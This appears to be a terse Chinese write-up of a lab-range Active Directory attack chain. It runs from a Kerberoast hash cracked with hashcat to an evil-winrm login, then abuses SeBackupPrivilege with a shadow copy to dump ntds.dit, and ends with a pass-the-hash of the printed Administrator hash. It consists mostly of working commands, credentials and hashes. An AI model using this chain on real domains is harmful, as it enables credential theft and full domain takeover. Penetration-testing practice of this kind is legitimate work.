$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$5980af1ee5113cf15982716f81fe292e$2de5fceb289adba19f53386ff2a37ff66cc21d791bb07fed8ecf32f6faaacd81e6b14c940112eeb5d916ec8399c05c749ca084611904528cecd863a277a3b1cde7894df22ddeb3f75376c36225bdd36ced1552f26e710ff6ba0f7ae3d7b18d40a53c3d542e760f1238729ceb36a3961f066b42dd884f20257734e669d6aa360ea6d95f31e5f78b5197f4d5bdaffab47560549f1b9d90dc42a27c3af406e598f3a0bf512dbbb4003e712c959a525835c003367f884122b6b6c91e15041db70880a8dbe14ea4f58491359c99e9a8286af633e8e8657fd384823802013138cbf2d69d500988a6291b0d6d97e179a5a7e7687d3c6be2f2dffed95b82ebc1c8707b03667ed0ff61943da5c339001e4504304389b7265939451b9b167d88ecff42d2c2ce54fdb5f8b510795b06f8622486299a3d1fa3e7651d2d1bfcbe3c389e4cccf8c3cea37f995a995ba02670e0884ecf8730009a3e1340c77877a47f932bc1f49dbb95177e310a726f696950849f2f9ded851349b872215fd6f6f175db296ffa3b7e4ee1268ba6d27e7d754f6bc2470d21e96b508e6da4a463fafd926e66835c8dff087e6ad5aa5ff41ca9ad0afda9dc1174d33b92271f28c914ea92ea6b1199b68905ed2f6b07712d81c9a79824d10cadfbcb279ff87c54bf8efdd0b6ab2ce8bc8c4af868b81747523f0f2ad92d0412b23a3b8660f89e69b318746f1125023e0c2e55df5d218f656c6734daa5bc6375fbad8669ab5e001066127ae7150eeeb50868f6dd31379a90bf50999d14000c166421f1d1033e3f5f3e31eb1033070b4305876c1cddbdd8b1b30ea92e0339ebd194f5418095b70c46e96b6b56a3cf707fbc9bfa9711b15e9c9de2bf4602d0cf698367ac43c62d58ae161a10fcb79acae09213f01c1b4256ac83580ca52dc671808dfc1c51b653fb12d31966151a74c930b891d88c2b2185f3d8d7f9172f58eed2af3506e6785e2198c3b21a1d33504f1c0bc3e50d13c00b5b1a5533f49429b6cfe45d9e7e3aa350500f70b47bf6066dbc0ea9128a3950ff3c9527bf53f6f6df27cb6d4e772ac4fb30c0e0e012168213105687d292a76e42c643f389ebe3dff94e9fedcaea101096a6b6e83fff935939df556c6e3be1b1d8b8ff087ac0abf5e057d42106647d4d9f039e0fc7805628cb0f2bd090448e07466012136734e881c2ade6d54514224d8402499560fb406e11de2d43bb1d6bceb1d5a0a6c9181db1f807e8afe10a1a3ae398b62b37afaebd5f7de3373e9e743e9294ed61d03631f85b63e093300692e80504e17b5e31fe3d061c69d0bbeaa48fa5c2679aa514fd10e15b72f6cfc96e815f4d6c8682ff88e9847a580268d628da8324846242c5afb6f1555a0498f5280758b32b406a96271ba14ff49a05cc5e01add9704cd358811e74bb4386a6af1d4e8fa09b64d2f0d6a765e280674fab25a2c9e0bf2b0e366b0760d79fda67874615
爆破hash
hashcat -a 0 -m 13100 hash.txt rockyou.txt
winrm连接
proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
whoami /priv查看用户权限,发现又多一个SeBackupPrivilege
谈谈域渗透中常见的可滥用权限及其应用场景(二)-腾讯云开发者社区-腾讯云
利用卷影拷贝服务提取ntds.dit - 先知社区
kali中创建raj.dsh
set context persistent nowriters add volume c: alias raj create expose %raj% z:
再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距
在C:/下创个目录,上传raj.dsh
卷影拷贝
下载ntds.dit和system到kali上
RoboCopy /b z:\windows\ntds . ntds.dit download ntds.dit reg save HKLM\SYSTEM system download system
解密出administrator的hash
impacket-secretsdump -ntds ntds.dit -system system local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
pth winrm上去
proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
